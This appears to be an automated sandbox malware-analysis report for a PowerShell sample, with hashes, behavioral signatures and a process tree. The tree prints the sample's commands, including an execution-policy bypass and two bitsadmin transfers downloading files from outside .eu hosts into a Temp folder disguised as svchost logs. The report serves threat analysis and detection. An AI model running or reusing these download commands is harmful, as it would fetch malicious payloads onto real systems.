Overview
overview
10Static
static
1WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 11:59
Static task
static1
Behavioral task
behavioral1
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
General
-
Target
WyChVIlbg/UaqyTpZb.ps1
-
Size
2KB
-
MD5
8540f5e40048f2e57fb5e2df66dbfe87
-
SHA1
eb038fd0f3e8bf11fdd16935de73ccf41d0331fd
-
SHA256
7005d74259760c7cc54a73e1c52cd8f7ff4aa641dac00fba952bc11d6557aae5
-
SHA512
b9555215dee32445c78a8138c885a5bb496dbd88d5d6f3037b9c427444fecb1cee0c5a2e3a23911f20ad2270f4e637725fbfae6cd19de5f8116924b817eba754
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3244 3428 bitsadmin.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1676 3428 bitsadmin.exe 84 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 3244 bitsadmin.exe 1676 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid Process 4272 powershell.exe 4272 powershell.exe 4272 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 4272 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 4272 wrote to memory of 4784 4272 powershell.exe 85 PID 4272 wrote to memory of 4784 4272 powershell.exe 85 PID 4272 wrote to memory of 4716 4272 powershell.exe 87 PID 4272 wrote to memory of 4716 4272 powershell.exe 87
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\UaqyTpZb.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:4784
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:4716
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer STEWnK /priority FOREGROUND "https://yjtyhm13.eu/topic//b119c81e4307a1741731136499c5468d.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3244
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer kmMNjX /priority FOREGROUND "https://nmhholiut13.eu/topic//b119c81e4307a1741731136499c5468d.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:1676
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82